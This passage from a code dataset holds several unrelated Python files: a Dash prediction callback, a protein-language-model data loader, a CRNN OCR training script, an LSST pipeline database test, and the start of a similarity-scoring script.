align=\"center\",\n        )\n    )\n    return children + [form]\n\n\n@callback(\n    Output({\"type\": \"result\", \"index\": MATCH}, \"children\"),\n    Input({\"type\": \"run-button\", \"index\": MATCH}, \"n_clicks\"),\n    State({\"type\": \"model-dropdown\", \"index\": MATCH}, \"value\"),\n    State({\"type\": \"bb\", \"index\": MATCH}, \"value\"),\n    State({\"type\": \"lk\", \"index\": MATCH}, \"value\"),\n)\ndef run_model(n_clicks: int, model_name: str, bb: str, lk: str) -> dbc.Label:\n    \"\"\"Runs the model when the \"Run Model\" button is clicked and displays the result.\n\n    Since there are potentially multiple \"Run Model\" buttons, we need to know which one\n    was clicked so we can fill in the corresponding result box. This is done using\n    Pattern-Matching Callbacks (see: https://dash.plotly.com/pattern-matching-callbacks)\n\n    Args:\n        n_clicks (int): Increments on a button click. 
The trigger for this callback.\n model_name (str): The name of the desired model to run\n bb (str): The Building Block SMILES string.\n lk (str): The Linker SMILES string.\n\n Raises:\n PreventUpdate: Prevents the callback from being run automatically on page load.\n\n Returns:\n dbc.Label: A label with the result of the model. Possible Answers:\n - INVALID INPUT\n - COLLAPSED\n - SHAPE PERSISTENT\n - MODEL ERROR\n \"\"\"\n if n_clicks is None or bb is None or lk is None:\n raise PreventUpdate\n\n try:\n result = predict(model_name, bb, lk)\n except ValueError:\n return dbc.Label(\"INVALID INPUT\", color=\"warning\")\n\n if result == 1:\n return dbc.Label(\"COLLAPSED\", color=\"danger\")\n if result == 0:\n return dbc.Label(\"SHAPE PERSISTENT\", color=\"success\")\n return dbc.Label(\"MODEL ERROR\", color=\"warning\")\n","repo_name":"ImperialCollegeLondon/SupraShare","sub_path":"website/callbacks.py","file_name":"callbacks.py","file_ext":"py","file_size_in_byte":3941,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"4970233544","text":"import functools\nfrom collections import OrderedDict\nfrom typing import Callable, List, Optional, Sequence, Tuple\n\nimport numpy as np\nimport pytorch_lightning as pl\nimport torch\nfrom esm.data import BatchConverter\nfrom sklearn.model_selection import train_test_split\nfrom torch.utils.data import DataLoader, Dataset, Sampler\n\n\nclass AlphabetDataLoader:\n \"\"\"Class that carries tokenizer information\"\"\"\n\n def __init__(\n self,\n prepend_bos: bool,\n append_eos: bool,\n mask_idx: int,\n pad_idx: int,\n standard_toks: List[str],\n model_dir: str,\n lambda_toks_to_ids: Callable,\n lambda_tokenizer: Callable,\n ) -> None:\n self.prepend_bos = prepend_bos\n self.append_eos = append_eos\n self.mask_idx = mask_idx\n self.padding_idx = pad_idx\n self.standard_toks = standard_toks\n self.model_dir = model_dir\n self.lambda_toks_to_ids = lambda_toks_to_ids\n self.lambda_tokenizer = lambda_tokenizer\n\n def tok_to_idx(self, x):\n return self.lambda_toks_to_ids(x)\n\n def tokenizer(self):\n \"\"\"Return seq-token based on sequence\"\"\"\n return self.lambda_tokenizer\n\n\nclass CustomBatchSampler(Sampler):\n r\"\"\"Wraps another sampler to yield a mini-batch of indices.\n\n This custom BatchSampler is inspired from the torch class BatchSampler.\n It takes a list of indexes and shuffle the indexes at each epochs.\n\n Args:\n sampler (List): List of indexes. indexes are a collections of List[int],\n corresponding to the index of the protein sequence.\n batch_size (int): Size of mini-batch. 
1 in our case; a batch is already of the correct size.\n        drop_last (bool): If ``True``, the sampler will drop the last batch if\n            its size would be less than ``batch_size``\n    \"\"\"\n\n    def __init__(self, sampler, batch_size, drop_last):\n        if (\n            not (type(batch_size) == int)\n            or isinstance(batch_size, bool)\n            or batch_size <= 0\n        ):\n            raise ValueError(\n                \"batch_size should be a positive integer value, \"\n                \"but got batch_size={}\".format(batch_size)\n            )\n        if not isinstance(drop_last, bool):\n            raise ValueError(\n                \"drop_last should be a boolean value, but got \"\n                \"drop_last={}\".format(drop_last)\n            )\n        self.sampler = sampler\n        self.batch_size = batch_size\n        self.drop_last = drop_last\n\n    def __iter__(self):\n        batch = []\n        np.random.shuffle(self.sampler)\n        for idx in self.sampler:\n            batch.append(idx)\n            if len(batch) == self.batch_size:\n                yield batch\n                batch = []\n        if len(batch) > 0 and not self.drop_last:\n            yield batch\n\n    def __len__(self):\n        if self.drop_last:\n            return len(self.sampler) // self.batch_size\n        else:\n            return (len(self.sampler) + self.batch_size - 1) // self.batch_size\n\n\nclass BatchDataset(Dataset):\n    def __init__(self, sequences: List[str]) -> None:\n        super().__init__()\n        self.sequences = np.array(sequences)\n\n    def __len__(self):\n        return len(self.sequences)\n\n    def __getitem__(self, index):\n        return self.sequences[index].tolist()\n\n\ndef convert_ckpt_to_statedict(checkpoint_state_dict: OrderedDict) -> OrderedDict:\n    \"\"\"This function converts a state_dict coming from a pytorch lightning checkpoint to\n    a model state_dict that can be loaded directly in the bio-transformers model.\n\n    The keys are updated so that they match those in the bio-transformers model.\n\n    Args:\n        checkpoint_state_dict: a state_dict loaded from a checkpoint\n    \"\"\"\n    new_state_dict = OrderedDict()\n    for k, v in checkpoint_state_dict.items():\n        new_k = \".\".join(k.split(\".\")[1:])  # remove model. 
prefix in key\n new_state_dict[new_k] = v.to(\"cpu\") # move tensor to cpu\n\n return new_state_dict\n\n\ndef worker_init_fn(worker_id: int):\n \"\"\"Set numpy random seed for each worker.\n\n https://github.com/pytorch/pytorch/issues/5059#issuecomment-404232359\n\n Args:\n worker_id: unique id for each worker\n \"\"\"\n np.random.seed(np.random.get_state()[1][0] + worker_id)\n\n\ndef mask_seq(\n seq: str,\n tokens: torch.Tensor,\n prepend_bos: bool,\n mask_idx: int,\n pad_idx: int,\n masking_ratio: float,\n masking_prob: float,\n random_token_prob: float,\n random_token_indices: List[int],\n) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"Mask one sequence randomly.\n\n Args:\n seq: string of the sequence.\n tokens: tokens corresponding to the sequence, length can be longer than the seq.\n prepend_bos: if tokenizer adds token\n mask_idx: index of the mask token\n pad_idx: index of the padding token\n masking_ratio: ratio of tokens to be masked.\n masking_prob: probability that the chose token is replaced with a mask token.\n random_token_prob: probability that the chose token is replaced with a random token.\n random_token_indices: list of token indices that random replacement selects from.\n\n Returns:\n tokens: masked tokens\n targets: same length as tokens\n \"\"\"\n # init\n seq_len = len(seq)\n mask_num = int(np.ceil(seq_len * masking_ratio))\n targets = tokens.detach().clone()\n # sample indices\n mask_indices = sorted(\n np.random.choice(seq_len, mask_num, replace=False) + int(prepend_bos)\n )\n # mask tokens\n for idx in mask_indices:\n rand = np.random.random()\n\n # replace with mask\n if rand < masking_prob:\n tokens[idx] = mask_idx\n\n # replace with random token\n elif rand < masking_prob + random_token_prob:\n tokens[idx] = np.random.choice(random_token_indices, 1)[0]\n\n # generate targets\n non_mask_indices = [i for i in range(seq_len) if i not in mask_indices]\n targets[non_mask_indices] = pad_idx\n\n return tokens, targets\n\n\ndef collate_fn(\n samples: Sequence[Tuple[str, str]],\n tokenizer: BatchConverter,\n alphabet: AlphabetDataLoader,\n masking_ratio: float,\n masking_prob: float,\n random_token_prob: float,\n) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"Collate function to mask tokens.\n\n Args:\n samples: a sequences of (label, seq).\n tokenizer: facebook tokenizer, that accepts sequences of (label, seq_str)\n and outputs (labels, seq_strs, tokens).\n alphabet: facebook alphabet.\n masking_ratio: ratio of tokens to be masked.\n masking_prob: probability that the chose token is replaced with a mask token.\n random_token_prob: probability that the chose token is replaced with a random token.\n\n Returns:\n tokens: model input\n targets: model target\n mask_indices: indices of masked tokens\n \"\"\"\n random_token_indices = [alphabet.tok_to_idx(aa) for aa in alphabet.standard_toks]\n seqs, tokens = tokenizer(\n samples[0]\n ) # take samples[0] because batch_sampler return list of list\n tokens_list, targets_list = [], []\n for i, seq in enumerate(seqs):\n tokens_i, targets_i = mask_seq(\n seq=seq,\n tokens=tokens[i, :],\n prepend_bos=alphabet.prepend_bos,\n mask_idx=alphabet.mask_idx,\n pad_idx=alphabet.padding_idx,\n masking_ratio=masking_ratio,\n masking_prob=masking_prob,\n random_token_prob=random_token_prob,\n random_token_indices=random_token_indices,\n )\n tokens_list.append(tokens_i)\n targets_list.append(targets_i)\n\n tokens = torch.stack(tokens_list)\n targets = torch.stack(targets_list)\n\n return tokens, targets\n\n\ndef _filter_sequence(\n 
sequences_list: List[str], model: str, filter_len: int\n) -> List[str]:\n    \"\"\"Function that filters a sequence list by length\n\n    Filtering depends on the type of model. It is automatically enforced, as ESM1b\n    doesn't manage sequences longer than 1024.\n\n    Args:\n        sequences_list : list of sequences\n        model : name of the model\n        filter_len : length limit to consider\n    Raises:\n        ValueError if filter_len <= 0\n    \"\"\"\n\n    if model == \"esm1b_t33_650M_UR50S\":\n        filter_len = min(filter_len, 1024) if filter_len is not None else 1024\n        return [seq for seq in sequences_list if len(seq) < filter_len]\n\n    if filter_len is not None:\n        if filter_len <= 0:\n            raise ValueError(\"filter_len argument should be > 0\")\n        return [seq for seq in sequences_list if len(seq) < filter_len]\n\n    return sequences_list\n\n\ndef get_batch_indices(\n    sequence_strs,\n    toks_per_batch: int,\n    extra_toks_per_seq: int = 0,\n) -> List[List[int]]:\n    \"\"\"Get the batch indexes based on the number of tokens in the sequences\n\n    It computes a list of lists of int, which are the lists of indexes to consider\n    to build a batch.\n    Example:\n        returning [[1,3,8],[4,7,10],[11],[12]] means that the first batch is\n        composed of the sequences at indexes 1, 3 and 8, and the last two batches of\n        sequences 11 and 12 alone. The idea is to consider a maximum number of tokens per batch.\n\n    Args:\n        sequence_strs: list of strings\n        toks_per_batch (int): maximum number of tokens per batch\n        extra_toks_per_seq (int, optional): extra tokens added per sequence (e.g. BOS/EOS). Defaults to 0.\n\n    Returns:\n        List: list of batch indexes\n    \"\"\"\n    buffer_type = List[int]\n    sizes = [(len(s), i) for i, s in enumerate(sequence_strs)]\n    sizes.sort()\n    batches: List[buffer_type] = []\n    buffer: buffer_type = []\n    max_len = 0\n\n    def _flush_current_buf():\n        nonlocal max_len, buffer\n        if len(buffer) == 0:\n            return\n        batches.append(buffer)\n        buffer = []\n        max_len = 0\n\n    for sz, i in sizes:\n        sz += extra_toks_per_seq\n        if max(sz, max_len) * (len(buffer) + 1) > toks_per_batch:\n            _flush_current_buf()\n        max_len = max(max_len, sz)\n        buffer.append(i)\n\n    _flush_current_buf()\n    return batches\n\n\ndef create_dataloader(\n    sequences: List[str],\n    alphabet: AlphabetDataLoader,\n    filter_len: int,\n    masking_ratio: float,\n    masking_prob: float,\n    random_token_prob: float,\n    num_workers: int = 0,\n    toks_per_batch: int = 128,\n    extra_toks_per_seq: int = 2,\n) -> DataLoader:\n    \"\"\"Create the PyTorch DataLoader.\n\n    Args:\n        sequences: list of sequences\n        alphabet: facebook alphabet.\n        filter_len: length limit used to filter the sequences\n        num_workers: num of parallel data samplers\n        masking_ratio: ratio of tokens to be masked.\n        masking_prob: probability that the chosen token is replaced with a mask token.\n        random_token_prob: probability that the chosen token is replaced with a random token.\n\n    Returns:\n        torch DataLoader\n    \"\"\"\n    sequences = _filter_sequence(sequences, alphabet.model_dir, filter_len)\n\n    batches = get_batch_indices(\n        sequences, toks_per_batch=toks_per_batch, extra_toks_per_seq=extra_toks_per_seq\n    )\n\n    dataset = BatchDataset(sequences)\n    b_sampler = CustomBatchSampler(batches, batch_size=1, drop_last=False)\n\n    loader = DataLoader(\n        dataset,\n        num_workers=num_workers,\n        collate_fn=functools.partial(\n            collate_fn,\n            tokenizer=alphabet.tokenizer(),\n            alphabet=alphabet,\n            masking_ratio=masking_ratio,\n            masking_prob=masking_prob,\n            random_token_prob=random_token_prob,\n        ),\n        pin_memory=True,\n        worker_init_fn=worker_init_fn,\n        batch_sampler=b_sampler,\n        sampler=None,\n    )\n    return loader\n
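\n\n# A quick illustrative sketch of how the token-based batching above behaves (added\n# commentary, not in the original file; the toy sequences are made up). With\n# toks_per_batch=10 and extra_toks_per_seq=2, each 3-mer costs 5 tokens, so only two\n# fit in a batch:\n#\n#     toy = [\"MKT\", \"AAA\", \"GGG\"]\n#     print(get_batch_indices(toy, toks_per_batch=10, extra_toks_per_seq=2))\n#     # -> [[0, 1], [2]]  (indexes refer to positions in the input list)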
\n\nclass BioDataModule(pl.LightningDataModule):\n    def __init__(\n        self,\n        train_sequences: List[str],\n        alphabet: AlphabetDataLoader,\n        filter_len: int,\n        masking_ratio: float,\n        masking_prob: float,\n        random_token_prob: float,\n        toks_per_batch: int = 128,\n        extra_toks_per_seq: int = 2,\n        num_workers: int = 0,\n        validation: bool = True,\n    ):\n        super().__init__()\n        self.train_sequences = train_sequences\n        self.alphabet = alphabet\n        self.filter_len = filter_len\n        self.masking_ratio = masking_ratio\n        self.masking_prob = masking_prob\n        self.random_token_prob = random_token_prob\n        self.toks_per_batch = toks_per_batch\n        self.extra_toks_per_seq = extra_toks_per_seq\n        self.num_workers = num_workers\n        self.validation = validation\n\n    def prepare_data(self):\n        pass\n\n    def setup(self, stage: Optional[str] = None):\n\n        # Assign train/val datasets for use in dataloaders\n        if stage == \"fit\" or stage is None:\n            if self.validation:\n                self.seq_train, self.seq_val = train_test_split(\n                    self.train_sequences, test_size=0.2\n                )\n            else:\n                self.seq_train = self.train_sequences\n\n            # Optionally...\n            # self.dims = tuple(self.mnist_train[0][0].shape)\n\n        # Assign test dataset for use in dataloader(s)\n        # if stage == \"test\" or stage is None:\n        #     self.mnist_test = MNIST(self.data_dir, train=False, transform=self.transform)\n\n    def train_dataloader(self):\n        return create_dataloader(\n            sequences=self.seq_train,\n            alphabet=self.alphabet,\n            filter_len=self.filter_len,\n            num_workers=self.num_workers,\n            masking_ratio=self.masking_ratio,\n            masking_prob=self.masking_prob,\n            random_token_prob=self.random_token_prob,\n            toks_per_batch=self.toks_per_batch,\n            extra_toks_per_seq=self.extra_toks_per_seq,\n        )\n\n    def val_dataloader(self):\n        if self.validation:\n            return create_dataloader(\n                sequences=self.seq_val,\n                alphabet=self.alphabet,\n                filter_len=self.filter_len,\n                num_workers=self.num_workers,\n                masking_ratio=self.masking_ratio,\n                masking_prob=self.masking_prob,\n                random_token_prob=self.random_token_prob,\n                toks_per_batch=self.toks_per_batch,\n                extra_toks_per_seq=self.extra_toks_per_seq,\n            )\n        else:\n            pass\n\n    def test_dataloader(self):\n        pass\n","repo_name":"wushixian/bio-transformers","sub_path":"biotransformers/lightning_utils/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":14433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"}
+{"seq_id":"36847992320","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n'''=================================================\n@File   :trainning.py\n@IDE    :PyCharm\n@Author :gpwang\n@Date   :2021/10/6\n@Desc   : Main training code\n=================================================='''\nimport torch\nimport torch.optim as optim\nimport torch.utils.data\nfrom torch.autograd import Variable\nfrom torch.nn import CTCLoss\nimport os\nimport utils\nfrom data import dataset\nimport models.crnn as net\nimport config\nfrom pathlib import Path\n\nexpr_dir = Path(config.expr_dir)\nif not expr_dir.exists():  # create the folder if it does not exist\n    expr_dir.mkdir(parents=True)\n# ------------------------------------------------\n\"\"\"\nLoad the training and validation datasets\n\"\"\"\n\n\ndef data_loader():\n    train_dataset = dataset.CRNNDataset(root=config.TRAIN_ROOT, transform=config.transformations)\n    train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=config.batchSize,\n                                               shuffle=True, num_workers=int(config.workers))\n    val_dataset = dataset.CRNNDataset(root=config.VAL_ROOT,\n                                      transform=dataset.ResizeNormalize(\n                                          (config.imgW, config.imgH)))  # the validation set must also be transformed\n    val_loader = torch.utils.data.DataLoader(val_dataset, shuffle=True, batch_size=config.batchSize,\n                                             num_workers=int(config.workers))\n\n    return train_loader, val_loader\n
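\n\n# Illustrative only (added commentary, not in the original file): a quick sanity\n# check of the loaders, assuming config points at valid dataset roots.\n#\n#     train_loader, val_loader = data_loader()\n#     images, texts = next(iter(train_loader))\n#     print(images.shape)  # expected torch.Size([batchSize, nc, imgH, imgW])\n#     print(len(texts))    # batchSize label strings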
\n\n\"\"\"\n1 network initialization\n2 weight initialization\n3 whether to load pretrained weights\n\"\"\"\n\n\ndef weights_init(m):\n    \"\"\"\n    Weight initialization\n    :param m:\n    :return:\n    \"\"\"\n    classname = m.__class__.__name__\n    if classname.find('Conv') != -1:\n        m.weight.data.normal_(0.0, 0.02)\n    elif classname.find('BatchNorm') != -1:\n        m.weight.data.normal_(1.0, 0.02)\n        m.bias.data.fill_(0)\n\n\n\"\"\"\nNetwork initialization\n\"\"\"\n\n\ndef net_init():\n    nclass = len(config.alphabet) + 1  # must add one for the CTC blank character\n    crnn = net.CRNN(config.imgH, config.nc, nclass, config.nh)\n    crnn.apply(weights_init)\n    if config.pretrained != '':  # resume training from a pretrained checkpoint\n        print('loading pretrained model from %s' % config.pretrained)\n        if config.multi_gpu:\n            crnn = torch.nn.DataParallel(crnn)\n        crnn.load_state_dict(torch.load(config.pretrained))\n    return crnn\n\n\n# ------------------------------validation on the validation set--------\ndef val(crnn, criterion, val_loader, device, converter):\n    print('Start val')\n    crnn.eval()\n    n_correct = 0\n    loss_avg = utils.averager()  # The global loss_avg is used by train\n    for i, data in enumerate(val_loader):\n        cpu_images, cpu_texts = data\n        batch_size = cpu_images.size(0)\n        image = cpu_images.to(device)\n        text, length = converter.encode(cpu_texts)\n        text = text.to(device)\n        length = length.to(device)\n        with torch.no_grad():\n            preds = crnn(image)\n        preds_size = Variable(torch.LongTensor([preds.size(0)] * batch_size))\n        cost = criterion(preds, text, preds_size, length) / batch_size\n        loss_avg.add(cost)\n\n        _, preds = preds.max(2)\n        preds = preds.transpose(1, 0).contiguous().view(-1)\n        sim_preds = converter.decode(preds.data, preds_size.data, raw=False)\n        cpu_texts_decode = cpu_texts\n        for pred, target in zip(sim_preds, cpu_texts_decode):\n            if pred == target:\n                n_correct += 1\n\n        raw_preds = converter.decode(preds.data, preds_size.data, raw=True)[:config.n_val_disp]\n        for raw_pred, pred, gt in zip(raw_preds, sim_preds, cpu_texts_decode):\n            print('%-20s => %-20s, gt: %-20s' % (raw_pred, pred, gt))\n\n    accuracy = n_correct / len(val_loader.dataset)  # float(len(val_loader) * params.batchSize)\n    print('Val loss: %f, accuracy: %f' % (loss_avg.val(), accuracy))\n    return accuracy\n\n\n# ---------------------------------main training code--------\ndef train_batch(crnn, criterion, optimizer, data, device, convert):\n    crnn.train()\n    cpu_images, cpu_texts = data\n    cpu_images = cpu_images.to(device)\n    batch_size = cpu_images.size(0)\n    text, length = convert.encode(cpu_texts)\n    text = text.to(device)\n    length = length.to(device)\n    image = cpu_images\n    optimizer.zero_grad()\n    preds = crnn(image)\n    preds_size = torch.LongTensor([preds.size(0)] * batch_size)\n    cost = criterion(preds, text, preds_size, length) / batch_size\n    cost.backward()\n    optimizer.step()\n    return cost\n
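\n\n# Note (added commentary, not in the original file): CTCLoss expects preds of shape\n# (T, N, C) -- sequence length, batch size, number of classes -- which is why\n# preds_size is filled with preds.size(0). A tiny shape check with made-up numbers:\n#\n#     T, N, C = 26, 4, len(config.alphabet) + 1\n#     dummy = torch.randn(T, N, C).log_softmax(2)\n#     targets = torch.randint(1, C, (N, 5))\n#     sizes, lengths = torch.LongTensor([T] * N), torch.LongTensor([5] * N)\n#     print(CTCLoss(zero_infinity=True)(dummy, targets, sizes, lengths))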
enumerate(train_loader):\n cost = train_batch(crnn, criterion, optimizer, data, config.device, converter)\n loss += cost.data.cpu().numpy()\n if (i + 1) % interval == 0:\n curAcc = val(crnn, criterion, val_loader, config.device, converter)\n if curAcc > acc:\n checkpoint = {\n 'model': crnn.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'epoch': i + 1\n }\n acc = curAcc\n torch.save(checkpoint, f'{expr_dir}/bestAcc.pth')\n torch.save(crnn.state_dict(), 'crnn.pth') # save only the model weights (state_dict)\n pbar.update(i + 1, values=[('loss', loss / ((i + 1) * config.batchSize)), ('acc', curAcc)])\n print(loss / ((i + 1) * config.batchSize))\n\n\nif __name__ == '__main__':\n train()\n","repo_name":"iwanggp/crnn-pytorch","sub_path":"new_version/trainning.py","file_name":"trainning.py","file_ext":"py","file_size_in_byte":6261,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} {"seq_id":"32087311082","text":"from itertools import izip\nimport os, os.path\nimport pdb\nimport sys\nimport time\nimport unittest\n\nfrom lsst.daf.base import cout, Citizen, DateTime, PropertySet\nfrom lsst.pex.policy import Policy\nfrom lsst.daf.persistence import DbAuth, DbStorage, LogicalLocation\nfrom lsst.pex.harness.Clipboard import Clipboard\nfrom lsst.pex.harness.Queue import Queue\nfrom lsst.pex.harness.IOStage import InputStage, OutputStage\n\nimport lsst.pex.logging as log\nimport lsst.ap.pipeline as ap\n\n\nclass PipelineTestCase(unittest.TestCase):\n \"\"\"\n Runs a single visit through the association pipeline. Assumes the existence\n of a test_ap database that contains copies of the necessary input data\n \"\"\"\n def setUp(self):\n # Turn on tracing\n log.Trace.setVerbosity('', 10)\n log.ScreenLog.createDefaultLog(True, log.Log.INFO)\n\n # Eventually, these should be read from a policy somewhere\n self.dbServer = 'lsst10.ncsa.uiuc.edu'\n self.dbPort = '3306'\n self.dbType = 'mysql'\n if not DbAuth.available(self.dbServer, self.dbPort):\n self.fail(\"Cannot access database server %s:%s\" % (self.dbServer, self.dbPort))\n # Construct test run database name\n self.runId = DbAuth.username(self.dbServer, self.dbPort) +\\\n time.strftime(\"_test_ap_%y%m%d_%H%M%S\", time.gmtime())\n\n # Tweak these to run on different input data, or with a different number of slices\n self.universeSize = 2\n self.visitId = 708125\n self.filter = 'u'\n self.ra = 333.880166667\n self.dec = -17.7374166667\n\n self.dbUrlPrefix = ''.join([self.dbType, '://', self.dbServer, ':', self.dbPort, '/'])\n self.dbUrl = self.dbUrlPrefix + self.runId\n self.substitutions = { 'visitId': self.visitId,\n 'filter': self.filter,\n 'runId': self.runId }\n # Create a database specifically for the test (copy relevant\n # tables from the test_ap database)\n mysqlStatements = [\n \"\"\"CREATE DATABASE %(runId)s\"\"\",\n \"\"\"USE %(runId)s\"\"\",\n \"\"\"CREATE TABLE VarObject LIKE test_ap.Object\"\"\",\n \"\"\"CREATE TABLE NonVarObject LIKE test_ap.Object\"\"\",\n \"\"\"CREATE TABLE DIASource LIKE test_ap.DIASource\"\"\",\n \"\"\"CREATE TABLE prv_Filter LIKE test_ap.prv_Filter\"\"\",\n \"\"\"INSERT INTO prv_Filter SELECT * FROM test_ap.prv_Filter\"\"\",\n \"\"\"CREATE TABLE _tmp_v%(visitId)d_DIASource\n LIKE test_ap._tmp_v%(visitId)d_DIASource\"\"\",\n \"\"\"INSERT INTO _tmp_v%(visitId)d_DIASource\n SELECT * FROM test_ap._tmp_v%(visitId)d_DIASource\"\"\",\n \"\"\"CREATE TABLE _tmp_v%(visitId)d_Preds\n LIKE test_ap._tmp_v%(visitId)d_Preds\"\"\",\n \"\"\"INSERT INTO _tmp_v%(visitId)d_Preds\n SELECT * FROM 
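The converter.decode call in the CRNN validation loop above comes from utils and is not shown in this record; conceptually it performs CTC greedy decoding (argmax per timestep, collapse repeated labels, drop blanks). A minimal standalone sketch, assuming blank index 0 and alphabet classes starting at index 1:

# Minimal sketch of CTC greedy decoding; the real utils.strLabelConverter is
# not shown here, so treat this as an illustration, not the project's code.
def ctc_greedy_decode(indices, alphabet, blank=0):
    out = []
    prev = blank
    for idx in indices:
        if idx != blank and idx != prev:  # skip blanks and repeats
            out.append(alphabet[idx - 1])  # class 1..N maps to alphabet[0..N-1]
        prev = idx
    return ''.join(out)

print(ctc_greedy_decode([0, 3, 3, 0, 1, 1, 2], "abc"))  # -> cab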
test_ap._tmp_v%(visitId)d_Preds\"\"\",\n \"\"\"CREATE TABLE _tmpl_MatchPair LIKE test_ap._tmpl_MatchPair\"\"\",\n \"\"\"CREATE TABLE _tmpl_IdPair LIKE test_ap._tmpl_IdPair\"\"\",\n \"\"\"CREATE TABLE _tmpl_InMemoryObject LIKE test_ap._tmpl_InMemoryObject\"\"\",\n \"\"\"CREATE TABLE _tmpl_InMemoryMatchPair LIKE test_ap._tmpl_InMemoryMatchPair\"\"\",\n \"\"\"CREATE TABLE _tmpl_InMemoryId LIKE test_ap._tmpl_InMemoryId\"\"\",\n \"\"\"CREATE TABLE _ap_DIASourceToObjectMatches LIKE test_ap._ap_DIASourceToObjectMatches\"\"\",\n \"\"\"CREATE TABLE _ap_PredToDIASourceMatches LIKE test_ap._ap_PredToDIASourceMatches\"\"\",\n \"\"\"CREATE TABLE _ap_DIASourceToNewObject LIKE test_ap._ap_DIASourceToNewObject\"\"\",\n \"\"\"CREATE TABLE _mops_Prediction LIKE test_ap._mops_Prediction\"\"\"\n ]\n db = DbStorage()\n db.setPersistLocation(LogicalLocation(self.dbUrlPrefix + 'test_ap'))\n try:\n for stmt in mysqlStatements:\n db.executeSql(stmt % self.substitutions)\n \n # Specify list of stages ...\n self.stages = [ ap.LoadStage,\n InputStage,\n ap.MatchDiaSourcesStage,\n OutputStage,\n InputStage,\n ap.MatchMopsPredsStage,\n OutputStage,\n ap.StoreStage ]\n\n # and read in stage policy for each stage\n policyDir = os.path.join(os.environ['AP_DIR'], 'pipeline', 'examples', 'policy')\n self.policies = [ Policy(os.path.join(policyDir,'LoadStage.paf')),\n Policy(os.path.join(policyDir,'MatchDiaSourcesStageInput.paf')),\n None,\n Policy(os.path.join(policyDir,'MatchDiaSourcesStageOutput.paf')),\n Policy(os.path.join(policyDir,'MatchMopsPredsStageInput.paf')),\n None,\n Policy(os.path.join(policyDir,'MatchMopsPredsStageOutput.paf')),\n Policy(os.path.join(policyDir,'StoreStage.paf')) ]\n\n # construct PropertySet for string interpolation\n psSubs = PropertySet()\n psSubs.setInt('visitId', self.visitId)\n psSubs.setString('runId', self.runId)\n psSubs.setString('filter', self.filter)\n psSubs.setString('work', '.')\n psSubs.setString('input', '/tmp')\n psSubs.setString('output', '/tmp')\n psSubs.setString('update', '/tmp')\n psSubs.setString('dbUrl', self.dbUrl)\n LogicalLocation.setLocationMap(psSubs)\n except:\n # cleanup database in case of error\n db.executeSql(\"DROP DATABASE %(runId)s\" % self.substitutions)\n raise\n\n def testOneVisit(self):\n # Create a list of clipboards, stage lists, and queue lists for each slice\n clipboards = [Clipboard() for i in xrange(self.universeSize)]\n stageLists = [[] for i in xrange(self.universeSize)]\n queueLists = []\n for i in xrange(self.universeSize):\n queueList = [Queue() for j in xrange(len(self.stages) + 1)]\n queueList[0].addDataset(clipboards[i])\n queueLists.append(queueList)\n\n # Create and initialize stages for each slice\n for stageClass, policy, i in izip(self.stages, self.policies, xrange(len(self.stages))):\n for stageList, queueList, rank in izip(stageLists, queueLists, xrange(self.universeSize)):\n stage = stageClass(i, policy)\n stage.setRun(self.runId)\n stage.setUniverseSize(self.universeSize)\n stage.setRank(rank - 1)\n stage.initialize(queueList[i+1], queueList[i])\n stageList.append(stage)\n\n # Create the association pipeline trigger event\n dateObs = DateTime.now().mjd(DateTime.TAI)\n triggerAssociationEvent = PropertySet()\n triggerAssociationEvent.setInt('visitId', self.visitId)\n triggerAssociationEvent.setDouble('dateObs', dateObs)\n triggerAssociationEvent.setString('filter', self.filter)\n triggerAssociationEvent.setDouble('ra', self.ra)\n triggerAssociationEvent.setDouble('decl', self.dec)\n\n # Create the event triggering the match 
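The statements above are filled in with mapping-based %-formatting, where one dict supplies every named field. A two-line illustration with made-up values:

# Mapping-based %-formatting as used for the SQL above (values are made up).
subs = {'runId': 'jdoe_test_ap_200101_120000', 'visitId': 708125}
print("CREATE TABLE _tmp_v%(visitId)d_DIASource LIKE test_ap._tmp_v%(visitId)d_DIASource" % subs)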
against moving object predictions\n triggerMatchMopsPredsEvent = PropertySet()\n triggerMatchMopsPredsEvent.setInt('visitId', self.visitId)\n\n # Add the events to clipboard of each stage\n for clip in clipboards:\n clip.put('triggerAssociationEvent', triggerAssociationEvent)\n clip.put('triggerMatchMopsPredsEvent', triggerMatchMopsPredsEvent)\n\n assert self.universeSize > 1\n masterStageList = stageLists.pop(0)\n\n # Run the pipeline (worker slices are run one after the other)\n for masterStage, workerStages in izip(masterStageList, izip(*stageLists)):\n masterStage.preprocess()\n map(lambda x: x.process(), workerStages)\n masterStage.postprocess()\n\n # Close log to avoid bogus memory-leak reports\n log.Log.closeDefaultLog()\n\n def tearDown(self):\n \"\"\"Clean up after test case runs\"\"\"\n db = DbStorage()\n db.setPersistLocation(LogicalLocation(self.dbUrlPrefix + 'test_ap'))\n #db.executeSql(\"DROP DATABASE %(runId)s\" % self.substitutions)\n del self.policies\n del self.stages\n\n\nclass MemoryTestCase(unittest.TestCase):\n \"\"\"Check for memory leaks of citizens\"\"\"\n def testLeak(self):\n nleak = Citizen.census(0, 0)\n if nleak != 0:\n Citizen.census(cout, 0)\n self.fail(\"Leaked %d blocks\" % nleak)\n\n\ndef suite():\n \"\"\"Returns a suite containing all the test cases in this module.\"\"\"\n suites = [ unittest.makeSuite(PipelineTestCase),\n unittest.makeSuite(MemoryTestCase) ]\n return unittest.TestSuite(suites)\n\ndef run(exit=False):\n \"\"\"Run the tests\"\"\"\n status = 0 if unittest.TextTestRunner().run(suite()).wasSuccessful() else 1\n return sys.exit(status) if exit else status\n\nif __name__ == \"__main__\":\n run(True)\n\n","repo_name":"lsst-dm/legacy-ap","sub_path":"tests/NightlyPipelineTest.py","file_name":"NightlyPipelineTest.py","file_ext":"py","file_size_in_byte":9156,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"632040950","text":"import sys\nimport argparse\nfrom simscores import ClassJaccarder, extract_classes_ids, jaccard\nimport logging\nimport os\nfrom collections import defaultdict\nfrom bs4 import BeautifulSoup\n\nlogger = 